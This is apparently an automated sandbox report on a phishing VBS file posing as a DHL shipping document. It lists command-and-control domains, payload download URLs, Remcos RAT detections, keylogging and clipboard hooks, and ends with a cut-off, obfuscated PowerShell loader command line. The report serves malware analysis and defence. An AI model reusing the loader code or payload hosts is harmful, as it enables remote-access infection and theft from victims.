Source: global traffic	DNS traffic detected: DNS query: janbours92harbu02.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000002.00000002.1943692775.000001379AA8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://contemega.com.do
Source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000002.00000002.2065998160.00000137B12D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.coma
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 00000013.00000002.2021961381.0000000003293000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.Pb)m
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.c
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.co
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.d
Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/N
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Ne
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Ned
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Neds
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedsl
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedsla
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslag
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagn
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagni
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnin
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagning
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings.
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings.d
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings.dw
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings.dwp
Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/zPwwF47.bin
Source: wab.exe, 0000000A.00000002.2261933839.0000000022470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe, 00000013.00000003.2001386225.000000000398B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: wab.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.c
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.co
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/N
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Ne
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Ned
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Neds
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedsl
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedsla
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslag
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagn
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagni
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnin
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagning
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.d
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dw
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwp
Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379A562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwpX
Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-09-10-14/PreSignInSettingsConfig.json
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=eafda5
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wab.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60918
Source: unknown	Network traffic detected: HTTP traffic on port 60918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

19_2_0041183A

Contains functionality to modify clipboard data

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	19_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	19_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	21_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	21_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	22_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	22_2_004072B5

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7792.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Elevarbejder.ShellExecute("P" & Anyone, Ergometercykelen, "", "", Aalegaard)

Sample has a suspicious name (potential lure to open the executable)

Source: DHL Shipping Document Awb & BL.vbs

Static file information: Suspicious name

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4250
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4250	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4250	Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 